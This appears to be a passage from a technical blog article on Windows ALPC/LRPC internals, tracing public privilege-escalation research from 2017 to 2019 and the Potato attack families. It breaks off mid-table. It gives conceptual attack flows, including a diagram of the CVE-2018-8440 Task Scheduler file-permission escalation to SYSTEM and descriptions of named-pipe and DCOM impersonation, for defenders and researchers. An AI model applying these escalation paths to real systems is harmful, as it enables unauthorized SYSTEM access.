&lt;p&gt;One consequence of the silent kernel rewiring is that pre-Vista NT 4-era code samples appear to work on Windows 11. A textbook example from a 1996 driver-development book that calls &lt;code&gt;NtCreatePort&lt;/code&gt; will link, load, and exchange messages just fine; the messages are travelling over the 2006 ALPC kernel object behind a 1993 syscall name. This is unusual generosity from a kernel team that breaks driver ABIs every few releases, and it is one of the reasons Microsoft has preserved the option not to publish a &lt;code&gt;Nt*Alpc*&lt;/code&gt; developer-facing reference: as long as everyone is supposed to use the RPC runtime, the kernel object can keep evolving.&lt;/p&gt;
&lt;p&gt;Once the transport was universal, enumeration became valuable. If only LSASS used ALPC, listing LSASS&apos;s interfaces by hand was fine. Once every service did, automation was the only tractable methodology. The answer to who built that automation is the next section.&lt;/p&gt;
&lt;h2&gt;6. The Eureka Year -- Public Tooling and the Interface-Callback Class (2017-2019)&lt;/h2&gt;
&lt;p&gt;In an eighteen-month span between October 2017 and December 2019, four researchers turned ALPC from internal NT plumbing into the most-attacked local-IPC surface in modern Windows. The exemplars were structurally identical: an LRPC server registered an RPC interface with a callback that either was NULL or returned &lt;code&gt;RPC_S_OK&lt;/code&gt; for a caller that should have received &lt;code&gt;RPC_S_ACCESS_DENIED&lt;/code&gt;. The kernel ALPC layer behaved correctly in every one of them. The application code did not.&lt;/p&gt;

gantt
    title Public ALPC and LRPC research, October 2017 to December 2019
    dateFormat YYYY-MM
    section Tooling and disclosure
    PacSec -- A view into ALPC-RPC plus CVE-2017-11783       :2017-10, 1M
    SandboxEscaper -- CVE-2018-8440 0-day on GitHub          :2018-08, 1M
    Forshaw -- PPL and COM injection through LRPC            :2018-10, 1M
    Ormandy -- CVE-2019-1162 MSCTF disclosure                :2019-08, 1M
    Forshaw -- Calling local RPC servers from .NET           :2019-12, 1M
&lt;p&gt;The first publication is &lt;strong&gt;Clement Rouault and Thomas Imbert&apos;s &quot;A view into ALPC-RPC&quot;&lt;/strong&gt;, presented at PacSec in November 2017 [@hakril-pacsec] [@slideshare-pacsec] and at Hack.lu the same season [@youtube-hacklu]. The talk is the first end-to-end mechanical walk of the LRPC-over-ALPC stack to appear at a public security conference, and the talk&apos;s deliverable was a working NDR-aware fuzzer named &lt;strong&gt;RPCForge&lt;/strong&gt; [@rpcforge]. RPCForge surfaced &lt;strong&gt;CVE-2017-11783&lt;/strong&gt; [@nvd-cve-2017-11783], the first publicly-acknowledged ALPC elevation-of-privilege issue surfaced by an outside-Microsoft fuzzer. The NVD entry phrases the bug class as &quot;the way it handles calls to Advanced Local Procedure Call (ALPC)&quot; -- the canonical &quot;ALPC EoP&quot; classification that NVD reuses for every later instance.&lt;/p&gt;
&lt;p&gt;The second is &lt;strong&gt;James Forshaw&apos;s &lt;code&gt;NtObjectManager&lt;/code&gt; tooling&lt;/strong&gt;, distributed through the &lt;code&gt;sandbox-attacksurface-analysis-tools&lt;/code&gt; repository at Google Project Zero [@forshaw-saatools]. The tooling is a PowerShell module backed by a .NET library originally called &lt;code&gt;NtApiDotNet&lt;/code&gt; and renamed to &lt;code&gt;NtCoreLib&lt;/code&gt; in 2024. Forshaw introduced the design intent in a December 17, 2019 Project Zero post titled &lt;em&gt;Calling Local Windows RPC Servers from .NET&lt;/em&gt; [@forshaw-rpc-2019], opening with what amounts to a personal manifesto: &lt;em&gt;&quot;As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting.&quot;&lt;/em&gt; The post named a gap in his own methodology -- &lt;em&gt;&quot;one of my big blind spots was anything which directly interacted with a Local RPC server&quot;&lt;/em&gt; -- and introduced &lt;code&gt;Get-RpcServer&lt;/code&gt;, &lt;code&gt;Get-NtAlpcServer&lt;/code&gt;, and &lt;code&gt;New-RpcClient&lt;/code&gt; as the cmdlets that closed it.&lt;/p&gt;

As much as I enjoy finding security vulnerabilities in Windows, in many ways I prefer the challenge of writing the tools to make it easier for me and others to do the hunting. -- James Forshaw, *Calling Local Windows RPC Servers from .NET*, Project Zero, December 17, 2019 [@forshaw-rpc-2019]
&lt;p&gt;The conceptual workflow Forshaw&apos;s tooling enables is short enough to fit on one screen. Enumerate every DLL on the system that contains RPC interface metadata. Parse the metadata to recover the IDL-equivalent description of each interface -- the UUID, the version, the procedures, the parameter types. Filter to the ones bound to a local-only protocol sequence. The result is an inventory of &quot;every local RPC procedure callable on this Windows install.&quot; Diff the inventory across a Patch Tuesday and the changes -- new procedures, retired procedures, changed security descriptors -- become a research backlog.&lt;/p&gt;
&lt;p&gt;{`
// PowerShell equivalent (run inside an elevated session with NtObjectManager installed):
//   Install-Module NtObjectManager
//   Get-RpcServer -DbgHelpPath &apos;C:\\Program Files\\Debugging Tools for Windows\\dbghelp.dll&apos; |
//     Where-Object { $&lt;em&gt;.Endpoints.ProtocolSequence -eq &apos;ncalrpc&apos; } |
//     Select-Object Name, InterfaceId, @{N=&apos;ProcCount&apos;;E={$&lt;/em&gt;.Procedures.Count}}&lt;/p&gt;
&lt;p&gt;// The runnable below mirrors the same logic in plain JS so the in-browser engine can execute it.
const interfaces = [
  { name: &apos;AppInfo&apos;,        interfaceId: &apos;201ef99a-7fa0-444c-9399-19ba84f12a1a&apos;, protocolSequence: &apos;ncalrpc&apos;, procedures: 12 },
  { name: &apos;schrpc&apos;,         interfaceId: &apos;86d35949-83c9-4044-b424-db363231fd0c&apos;, protocolSequence: &apos;ncalrpc&apos;, procedures: 27 },
  { name: &apos;spoolss&apos;,        interfaceId: &apos;12345678-1234-abcd-ef00-0123456789ab&apos;, protocolSequence: &apos;ncacn_np&apos;, procedures: 96 },
  { name: &apos;lsarpc-local&apos;,   interfaceId: &apos;12345778-1234-abcd-ef00-0123456789ab&apos;, protocolSequence: &apos;ncalrpc&apos;, procedures: 81 },
  { name: &apos;epmapper&apos;,       interfaceId: &apos;e1af8308-5d1f-11c9-91a4-08002b14a0fa&apos;, protocolSequence: &apos;ncalrpc&apos;, procedures: 5  },
];&lt;/p&gt;
&lt;p&gt;const local = interfaces
  .filter(i =&amp;gt; i.protocolSequence === &apos;ncalrpc&apos;)
  .map(i =&amp;gt; ({ name: i.name, interfaceId: i.interfaceId, procCount: i.procedures }));&lt;/p&gt;
&lt;p&gt;console.log(&apos;Local RPC interfaces (ncalrpc only):&apos;);
local.forEach(i =&amp;gt; console.log(`  ${i.name.padEnd(16)} ${i.interfaceId}  procs=${i.procCount}`));
console.log(`Total: ${local.length}`);
`}&lt;/p&gt;
&lt;p&gt;The third publication is &lt;strong&gt;SandboxEscaper&apos;s CVE-2018-8440&lt;/strong&gt; [@nvd-cve-2018-8440], dropped as a 0-day on GitHub on August 27, 2018, and triaged by CERT/CC as VU#906424 on August 28 with the note that the vulnerability was &quot;being exploited in the wild&quot; [@cert-vu906424]. The 0patch team published a micropatch within days and walked the bug specifics [@0patch-micropatch]. The structural shape of the bug is canonical and is worth tracing carefully.&lt;/p&gt;

sequenceDiagram
    participant Att as Unprivileged attacker process
    participant Sch as Task Scheduler ALPC port \RPC Control\atsvc
    participant Srv as schedsvc.dll worker thread (SYSTEM)
    participant FS as Target file -- C:\WINDOWS\System32\example.dll
    Att-&amp;gt;&amp;gt;Sch: NtAlpcConnectPort plus LRPC SchRpcSetSecurity request
    Sch-&amp;gt;&amp;gt;Srv: dispatch -- IfCallbackFn is NULL, no security callback runs
    Srv-&amp;gt;&amp;gt;FS: SetSecurityInfo as SYSTEM, grant Everyone:F to attacker-chosen path
    Srv-&amp;gt;&amp;gt;Att: RPC_S_OK
    Att-&amp;gt;&amp;gt;FS: overwrite the now-writable file
    Note over Att,FS: next call into the modified binary executes attacker code as SYSTEM
&lt;p&gt;The Task Scheduler service exposes an LRPC interface containing a procedure named &lt;code&gt;SchRpcSetSecurity&lt;/code&gt;, registered through &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt; with &lt;code&gt;IfCallbackFn&lt;/code&gt; set to NULL. NULL has a specific meaning, documented verbatim on Microsoft Learn: &lt;em&gt;&quot;IfCallbackFn: Security-callback function, or NULL for no callback&quot;&lt;/em&gt; [@msdocs-rpcregisterif2]. No callback means the RPC runtime dispatches the call without asking the application whether the caller should be allowed.&lt;/p&gt;
&lt;p&gt;Once dispatched, &lt;code&gt;SchRpcSetSecurity&lt;/code&gt; running in the SYSTEM-context Task Scheduler worker thread set a permissive DACL on a file the attacker specified. The attacker chose a file the attacker did not have write access to. The SYSTEM-context service made it writable. The attacker then wrote attacker-controlled bytes into the file, triggered execution, and inherited SYSTEM.&lt;/p&gt;
&lt;p&gt;The 0patch micropatch writeup named the structural pattern as &quot;the Task Scheduler fails to impersonate the requesting client&quot; [@0patch-micropatch] -- which is to say, the service did the operation in its own privileged identity instead of the caller&apos;s. CERT/CC framed the same bug in transport terms: a vulnerability &quot;in the handling of ALPC&quot; that lets an authenticated user overwrite an arbitrary file [@cert-vu906424].&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A NULL &lt;code&gt;IfCallbackFn&lt;/code&gt; is the canonical elevation-of-privilege-by-default bug shape. Microsoft Learn documents it as a legal value [@msdocs-rpcregisterif2], and the runtime accepts it without warning. Every notable LRPC EoP since 2017 either left the callback NULL or registered a callback whose body said the wrong thing. Defenders auditing in-house LRPC services should treat any &lt;code&gt;RpcServerRegisterIf2(..., NULL)&lt;/code&gt; in production code as a finding.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The fourth is &lt;strong&gt;Tavis Ormandy&apos;s CVE-2019-1162&lt;/strong&gt; [@nvd-cve-2019-1162], disclosed in the August 13, 2019 Project Zero post &lt;em&gt;Down the Rabbit-Hole...&lt;/em&gt; [@ormandy-ctf-2019]. The bug class Ormandy named is the structural exemplar of &quot;shared system ALPC ports that ignore caller integrity.&quot; The Microsoft Text Services Framework (MSCTF) shipped a global ALPC port -- present since Windows XP in 2001 -- that any process on the desktop could open regardless of integrity level. The CTF subsystem trusted clients to identify themselves correctly in the messages they sent; the protocol had no integrity-level check or AppContainer enforcement. A low-integrity browser process could send messages that impersonated a high-integrity privileged process, and the CTF service would honour them. The fix narrowed the specific instance and left the general class of &quot;shared ALPC ports without caller-integrity enforcement&quot; open.&lt;/p&gt;
&lt;p&gt;A partially-overlapping fifth example -- the same interface-callback class expressed through DCOM activation rather than direct LRPC -- is &lt;strong&gt;Forshaw&apos;s October 18, 2018 Project Zero post&lt;/strong&gt; &lt;em&gt;Injecting Code into Windows Protected Processes using COM&lt;/em&gt; [@forshaw-com-ppl-2018]. The post documented a class of &lt;a href=&quot;https://paragmali.com/blog/protected-process-light-when-the-administrator-isnt-enough/&quot; rel=&quot;noopener&quot;&gt;Protected Process Light&lt;/a&gt; (PPL) bypass in which a DCOM activator marshalled an impersonated client token into a privileged COM server, and the server&apos;s interface callback trusted the marshalled identity too early in the dispatch flow. The kernel ALPC layer is doing exactly what the spec says; the bug is in the user-mode interface code that interprets the message.&lt;/p&gt;

Before `NtObjectManager`, a researcher looking at an LRPC service had to disassemble the service&apos;s DLL by hand, locate the calls to `RpcServerRegisterIf2`, read out the interface UUID and procedure-table pointer, parse the MIDL-generated stub manually, and assemble enough information to send a single well-formed call. After `NtObjectManager`, the same workflow was a one-line PowerShell pipeline. The methodology change cascaded into the Patch-Tuesday cycle. Differential analysis on the RPC interface inventory across a single Patch Tuesday became a research workflow that a small team could run in a single afternoon. Forshaw&apos;s December 2019 post named it explicitly: he wrote the tools because the tools were the bottleneck.

The application-supplied function whose pointer is passed as the `IfCallbackFn` argument to `RpcServerRegisterIf2` [@msdocs-rpcregisterif2] or `RpcServerRegisterIf3` [@msdocs-rpcregisterif3]. The RPC runtime invokes the callback after the port-level access check passes and before the call is dispatched to the IDL-named procedure. The callback inspects the binding handle, the calling user&apos;s token, the integrity level, and any other attribute the application chooses to consult. The callback returns `RPC_S_OK` to permit the call or any other status code to reject it. A NULL callback pointer is documented as a legal value and means &quot;permit every call that reaches the runtime.&quot;

The wire format that LRPC payloads marshal through. NDR is the original 32-bit Network Data Representation transfer syntax used by DCE/RPC; NDR64 is the 64-bit extension Microsoft introduced for 64-bit Windows [@msdocs-ndr64]. Local LRPC and remote MSRPC use the same transfer syntax; the only difference is that local calls travel inside an ALPC `PORT_MESSAGE` body rather than over a TCP or named-pipe transport.
&lt;p&gt;By the end of 2019, the inventory was visible, the bug class had been named, and four worked exemplars had been published. The mechanism underneath -- what an interface-registration callback actually is, why the OS cannot enforce its correctness -- is what the next section unpacks.&lt;/p&gt;
&lt;p&gt;The deeper realisation is that none of these are kernel bugs. The kernel ALPC layer behaved correctly in every one; the bugs live in the user-mode interface-callback layer that Section 7 walks next.&lt;/p&gt;
&lt;h2&gt;7. The LRPC Overlay -- Interface Registration and the Asymmetry the OS Cannot Fix&lt;/h2&gt;
&lt;p&gt;Look at the signature of &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt;. The seventh parameter is named &lt;code&gt;IfCallbackFn&lt;/code&gt;. Microsoft&apos;s own reference page documents that NULL is a legal value, and that NULL means &quot;no callback&quot; [@msdocs-rpcregisterif2]. That parameter is the asymmetry the rest of this section is about.&lt;/p&gt;
&lt;p&gt;A canonical server-side LRPC startup sequence looks like this. The service compiles an IDL file with MIDL; MIDL emits an &lt;code&gt;RPC_SERVER_INTERFACE&lt;/code&gt; structure that pins down the interface&apos;s UUID, version, and procedure table. The service calls &lt;code&gt;RpcServerUseProtseqEp&lt;/code&gt; with the protocol sequence &lt;code&gt;&quot;ncalrpc&quot;&lt;/code&gt;, an endpoint name, and a security descriptor; that call asks the kernel, by way of the RPC runtime, to create an ALPC connection port at the requested name under &lt;code&gt;\RPC Control&lt;/code&gt;. The service calls &lt;code&gt;RpcServerRegisterIf2&lt;/code&gt; or, since Windows 8, &lt;code&gt;RpcServerRegisterIf3&lt;/code&gt; [@msdocs-rpcregisterif3]. The newer call additionally accepts a per-interface security descriptor that the runtime enforces before consulting the callback. Both calls store the IDL spec, the interface-registration flags, and the per-interface security callback. Finally the service calls &lt;code&gt;RpcServerListen&lt;/code&gt;, and worker threads in the RPC runtime block inside &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Per call, the dispatch sequence is: accept the inbound ALPC connection, read the NDR-encoded request from the message body, invoke the registered security callback (if any), dispatch to the MIDL-generated server stub, and marshal the reply back.&lt;/p&gt;

sequenceDiagram
    participant Client as Client stub (rpcrt4.dll, user mode)
    participant Kernel as Kernel ALPC dispatcher
    participant Worker as Server worker thread (rpcrt4.dll, user mode)
    participant Cb as Interface security callback (application code)
    participant Stub as MIDL-generated server stub (application code)
    Client-&amp;gt;&amp;gt;Kernel: NtAlpcSendWaitReceivePort (REQUEST with NDR body)
    Kernel-&amp;gt;&amp;gt;Worker: deliver message to blocked worker
    Worker-&amp;gt;&amp;gt;Cb: invoke IfCallbackFn (if registered)
    Cb-&amp;gt;&amp;gt;Worker: return RPC_S_OK or RPC_S_ACCESS_DENIED
    Worker-&amp;gt;&amp;gt;Stub: dispatch to MIDL procedure (if callback returned OK)
    Stub-&amp;gt;&amp;gt;Worker: result returned through NDR encoder
    Worker-&amp;gt;&amp;gt;Kernel: NtAlpcSendWaitReceivePort (REPLY)
    Kernel-&amp;gt;&amp;gt;Client: deliver reply
&lt;p&gt;The kernel&apos;s job ends at &quot;deliver the message to a worker thread.&quot; Everything after that is application code. The RPC runtime is a DLL that the service loads into its own address space, and the runtime&apos;s notion of authorization is whatever the callback returns. If the callback returns &lt;code&gt;RPC_S_OK&lt;/code&gt;, the call proceeds. If the callback is NULL, the call proceeds without ever asking the application. The kernel has no notion of &quot;this call requires &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;&quot; or &quot;this call requires the caller to be in the local Administrators group&quot;, because those notions are policy choices the application makes, not properties of the IPC primitive.&lt;/p&gt;

The RPC service-discovery primitive at the well-known ALPC port `\RPC Control\epmapper`. An LRPC client that knows the interface UUID it wants to call -- but not which endpoint name a particular service is listening on -- calls into the endpoint mapper, hands over the UUID, and gets back the endpoint name. The mapper is itself an LRPC service; it bootstraps the rest. `rpcss` (the DCOM activator service) hosts the endpoint mapper on every Windows install.

The Microsoft dialect of OSF DCE IDL used to declare RPC interfaces. An `.idl` file pins down the interface UUID, version, methods, and parameter types; the MIDL compiler produces three artifacts: a header for both client and server, a client-side stub that marshals call arguments into NDR, and a server-side stub that unmarshals NDR back into call arguments and dispatches to the application&apos;s implementation.
&lt;p&gt;The interface-registration flag inventory tells the same story from a different angle. Microsoft Learn enumerates the flags on a single reference page [@msdocs-ifflags]; the four that matter for this section are quoted verbatim from that page.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Flag&lt;/th&gt;
&lt;th&gt;What Microsoft says it does&lt;/th&gt;
&lt;th&gt;What it closes&lt;/th&gt;
&lt;th&gt;What it leaves open&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&quot;the RPC runtime invokes the registered security callback for all calls, regardless of identity, protocol sequence, or authentication level of the client&quot;&lt;/td&gt;
&lt;td&gt;Forces the callback to run even for unauthenticated calls&lt;/td&gt;
&lt;td&gt;The correctness of the callback&apos;s return value&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RPC_IF_ALLOW_SECURE_ONLY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;rejects callers that did not authenticate at the runtime&apos;s minimum authentication level&lt;/td&gt;
&lt;td&gt;Unauthenticated callers&lt;/td&gt;
&lt;td&gt;Authenticated-but-unauthorized callers; Microsoft notes verbatim that &quot;Using the RPC_IF_ALLOW_SECURE_ONLY flag does not imply or guarantee a high level of privilege on the part of the calling user&quot; [@msdocs-ifflags]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RPC_IF_SEC_NO_CACHE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&quot;Disables security callback caching, forcing a security callback for each RPC call on a given interface&quot;&lt;/td&gt;
&lt;td&gt;Stale cached approval after a token-state change&lt;/td&gt;
&lt;td&gt;The correctness of the callback&apos;s body&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;RPC_IF_ALLOW_LOCAL_ONLY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;rejects remote callers at the runtime layer&lt;/td&gt;
&lt;td&gt;Cross-machine reachability&lt;/td&gt;
&lt;td&gt;Local elevation primitives&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The table is the argument. Every flag closes a specific known-bad pattern. No flag changes the fact that the per-interface authorization decision is application code. The runtime can be configured to &lt;em&gt;force the callback to run&lt;/em&gt;. It cannot be configured to &lt;em&gt;make the callback return the right answer&lt;/em&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Port-level security is kernel infrastructure. Interface-level security is application code. The kernel can enforce the first; it cannot enforce the second. Everything in the rest of this article follows from that asymmetry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft Learn&apos;s verbatim note on &lt;code&gt;IfCallbackFn&lt;/code&gt; reads: &lt;em&gt;&quot;Security-callback function, or NULL for no callback. Each registered interface can have a different callback function.&quot;&lt;/em&gt; [@msdocs-rpcregisterif2] A NULL callback means &quot;anyone who can open the connection port can call any procedure on this interface.&quot; Many in-house services interpret the parameter as if NULL meant &quot;default deny.&quot; It does not. NULL is a default &lt;em&gt;allow&lt;/em&gt;, gated only by the port DACL. The CVE-2018-8440 SchRpcSetSecurity disclosure [@cert-vu906424] [@0patch-micropatch] is the canonical example of what that interpretation costs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;code&gt;RpcServerRegisterIf3&lt;/code&gt;, introduced in Windows 8 [@msdocs-rpcregisterif3], partially mitigates the structural concern by adding a per-interface security descriptor argument the runtime checks before the callback runs. Microsoft Learn documents the order: &lt;em&gt;&quot;If both SecurityDescriptor and IfCallbackFn are specified, the security descriptor in SecurityDescriptor will be checked first and the callback in IfCallbackFn will be called after the access check against the security descriptor passes.&quot;&lt;/em&gt; The &lt;code&gt;If3&lt;/code&gt; API also bakes in an &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt; default-deny: in the absence of an explicit security descriptor, the runtime refuses calls from AppContainer processes. These are real defences. They do not change the underlying property that the per-call authorization decision -- the one that says &quot;this caller is allowed to invoke this procedure with these arguments&quot; -- is delegated to an application function the kernel cannot inspect.&lt;/p&gt;
&lt;p&gt;The kernel-vs-application boundary inside &lt;code&gt;rpcrt4.dll&lt;/code&gt; is unusual and easy to miss. The same DLL contains both the user-mode side of the kernel ALPC syscall surface (the thin wrappers around &lt;code&gt;NtAlpcSendWaitReceivePort&lt;/code&gt; that the runtime threads call) and the interface dispatch loop that ends in the application callback. Both halves run inside the service process; both halves are user-mode code from the kernel&apos;s point of view. The kernel does not know which RPC interface a given ALPC message is going to dispatch to. It just hands the message to a worker thread and forgets.&lt;/p&gt;
&lt;p&gt;The endpoint-mapper bootstrap path is the other piece of the LRPC overlay worth naming. A client that knows the interface UUID it wants to talk to -- say, the AppInfo interface UUID for UAC -- but does not know which endpoint name &lt;code&gt;appinfo&lt;/code&gt; happens to be listening on, opens the well-known ALPC port &lt;code&gt;\RPC Control\epmapper&lt;/code&gt;, sends a query containing the UUID, and gets back the endpoint name. The endpoint mapper is itself an LRPC service running inside &lt;code&gt;rpcss&lt;/code&gt;. It bootstraps the rest of the local-IPC fabric.&lt;/p&gt;
&lt;p&gt;NDR and NDR64 are the wire format. &lt;code&gt;NdrClientCall3&lt;/code&gt; on the client side packs the call arguments into the NDR representation Microsoft documents on Learn [@msdocs-ndr64]; the bytes ride inside an ALPC &lt;code&gt;PORT_MESSAGE&lt;/code&gt; body to the server; &lt;code&gt;NdrStubCall3&lt;/code&gt; on the server side unpacks them. The same NDR format that travels over a TCP socket for cross-machine MSRPC travels through an ALPC port for local LRPC. The transport is the only thing that differs.&lt;/p&gt;

The intuitive question -- &quot;if the callback is the problem, why doesn&apos;t the kernel just check it?&quot; -- bumps into two impossibility results. First, the callback is a function pointer into application code. The kernel cannot symbolically execute the function to determine whether its return value is correct; that is a halting-problem-shaped task in the general case. Second, even if the kernel could execute the function, the kernel does not know what &quot;correct&quot; means for an arbitrary application&apos;s authorization policy. &quot;Correct&quot; is the application&apos;s specification of who should be allowed to call what, and the application is the only party that has that specification. Closing the gap requires either a new ABI in which the application declares its authorization policy in a language the OS can validate, or a runtime sandbox that confines what the callback can do. Neither has been proposed as a stable Microsoft direction in any public artefact.
&lt;p&gt;The structural punchline is that the RPC runtime is application code -- the callback runs in user mode in the server&apos;s address space, the runtime trusts whatever the callback returns, and the OS cannot validate the callback&apos;s body. The CVE-2019-1162 MSCTF disclosure [@ormandy-ctf-2019] and the local-COM-over-LRPC PPL-bypass class [@forshaw-com-ppl-2018] are &lt;em&gt;both&lt;/em&gt; structural instances of this asymmetry; no kernel change could have prevented them.&lt;/p&gt;
&lt;p&gt;That asymmetry is the engine. Almost every CVE on the Patch-Tuesday treadmill since 2018 -- the Task Scheduler ACL bug, the CTF subsystem disclosure, the PPL-COM bypasses, the Potato-family activations -- is structurally the same shape. Some are LRPC bugs. Some are not. The next section explains which is which.&lt;/p&gt;
&lt;h2&gt;8. Competing Approaches -- Named Pipes, COM, Filter Ports, and the Potato Disambiguation&lt;/h2&gt;
&lt;p&gt;Roughly half the time a defender reads &quot;Potato&quot; in a CVE writeup, the underlying primitive is not ALPC. The other half of the time, it is. Knowing which is which is the single most-cited reason defenders mis-classify privilege-escalation attacks. The disambiguation matters because the mitigations differ: an LRPC-on-ALPC Potato is closed (or worsened) by RPC interface-flag changes; a named-pipe Potato is closed (or worsened) by &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; policy.&lt;/p&gt;
&lt;p&gt;Before the Potato classification, four local-IPC primitives sit alongside LRPC-on-ALPC and deserve a brief tour.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Named pipes&lt;/strong&gt; [@msdocs-protseq] [@msdocs-impnp] [@csandker-np] are the first-class alternative that works both locally &lt;em&gt;and&lt;/em&gt; across machines over SMB. The Windows RPC runtime supports a &lt;code&gt;ncacn_np&lt;/code&gt; (Network Computing Architecture, Connection-oriented, Named Pipe) protocol sequence that lets an RPC interface be reached either through &lt;code&gt;\\.\pipe\name&lt;/code&gt; locally or through an SMB tree-connect remotely. The load-bearing security primitive for the named-pipe-Potato class is &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; [@msdocs-impnp], a Win32 API that lets the server end of a named pipe impersonate the client process; the API requires the caller to hold &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt;. The privilege is granted by default to LocalSystem, LocalService, NetworkService, and to processes that hold the privilege in their token through policy. The named-pipe-Potato attack pattern is &quot;a service running with &lt;code&gt;SeImpersonatePrivilege&lt;/code&gt; is tricked into connecting to a named pipe the attacker controls, and the attacker calls &lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; to inherit the service&apos;s token.&quot;&lt;/p&gt;

The Windows user-right that permits a thread to impersonate another security principal -- specifically by calling APIs such as `ImpersonateNamedPipeClient` [@msdocs-impnp] or `ImpersonateLoggedOnUser`. The privilege is granted by default to `LocalSystem`, `NetworkService`, `LocalService`, and processes started by the Service Control Manager. As Clement Labro summarised the practical implication: *&quot;if you have SeAssignPrimaryToken or SeImpersonate privilege, you are SYSTEM&quot;* [@itm4n-printspoofer], because every interactive way to use either privilege ends in a SYSTEM token under the right circumstances. The named-pipe-Potato family exploits exactly this fact.

The DCOM lookup primitive that translates an object exporter identifier (OXID) to a string binding (a protocol sequence plus an endpoint) where the corresponding COM server is listening. By default the OXID resolver runs in `rpcss` on TCP port 135. RoguePotato [@roguepotato-blog] [@roguepotato-repo] -- the post-Windows-10-1809 evolution of the Potato family -- redirects an outbound OXID-resolver query to an attacker-controlled host, which lets the attacker substitute an arbitrary endpoint and, through that, an arbitrary impersonation token.
&lt;p&gt;&lt;strong&gt;Shared sections plus events&lt;/strong&gt; is the lowest-level local-IPC pattern. Two processes call &lt;code&gt;NtCreateSection&lt;/code&gt; to back the same shared memory, then synchronise with kernel events or semaphores. There is no framing, no caller-identity primitive, and no message boundary. The pattern is used in performance-sensitive contexts such as browser sandboxes and DirectX swapchain handoff; it is not a competitor with LRPC-on-ALPC for general request-reply use cases.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;COM local activation&lt;/strong&gt; [@forshaw-com-ppl-2018] [@roguepotato-blog] is not a competitor. It is a higher-level overlay. The DCOM activation service (&lt;code&gt;rpcss&lt;/code&gt;) takes a CoCreateInstance-style activation request and, for local activations, marshals into LRPC under the hood. This is why DCOM-activation attacks are &lt;em&gt;also&lt;/em&gt; LRPC attacks: the trigger transport is DCOM, but the impersonation primitive ends up being the LRPC &lt;code&gt;RpcImpersonateClient&lt;/code&gt; machinery that runs inside the activated server.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Filter Communication Ports&lt;/strong&gt; [@msdocs-minifilter-replacement] [@msdocs-fltsendmessage] are the minifilter-specific IPC channel for talking between a kernel-mode file-system filter driver and a user-mode service. A minifilter calls &lt;code&gt;FltCreateCommunicationPort&lt;/code&gt; to set up the server side; a user-mode application calls &lt;code&gt;FilterConnectCommunicationPort&lt;/code&gt; to attach to it; the kernel-side &lt;code&gt;FltSendMessage&lt;/code&gt; and the user-side &lt;code&gt;FilterReplyMessage&lt;/code&gt; carry payloads in either direction. Filter Communication Ports are a separate primitive from ALPC and live in their own namespace; the only reason to mention them in this section is that defenders sometimes conflate &quot;any named local IPC endpoint&quot; with ALPC, and they should not.&lt;/p&gt;
&lt;p&gt;Now the Potato disambiguation. The &lt;a href=&quot;https://paragmali.com/blog/windows-access-control-25-years-of-attacks/&quot; rel=&quot;noopener&quot;&gt;Potato family&lt;/a&gt; is the loudest local-EoP cluster of the last decade, and the family contains two structurally different sub-families that share the surname for historical reasons.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Axis&lt;/th&gt;
&lt;th&gt;DCOM-activation Potato&lt;/th&gt;
&lt;th&gt;Named-pipe Potato&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Triggering protocol&lt;/td&gt;
&lt;td&gt;DCOM &lt;code&gt;CoGetInstanceFromIStorage&lt;/code&gt; activation against &lt;code&gt;127.0.0.1&lt;/code&gt; plus the local OXID resolver&lt;/td&gt;
&lt;td&gt;Service connects out to a named pipe controlled by the attacker (often via UNC or by tricking a print or EFS hook)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Impersonation primitive&lt;/td&gt;
&lt;td&gt;&lt;code&gt;RpcImpersonateClient&lt;/code&gt; invoked by the activated COM server during the LRPC dispatch&lt;/td&gt;
&lt;td&gt;&lt;code&gt;ImpersonateNamedPipeClient&lt;/code&gt; invoked by the attacker on the receiving end of the pipe&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Required attacker privilege&lt;/td&gt;
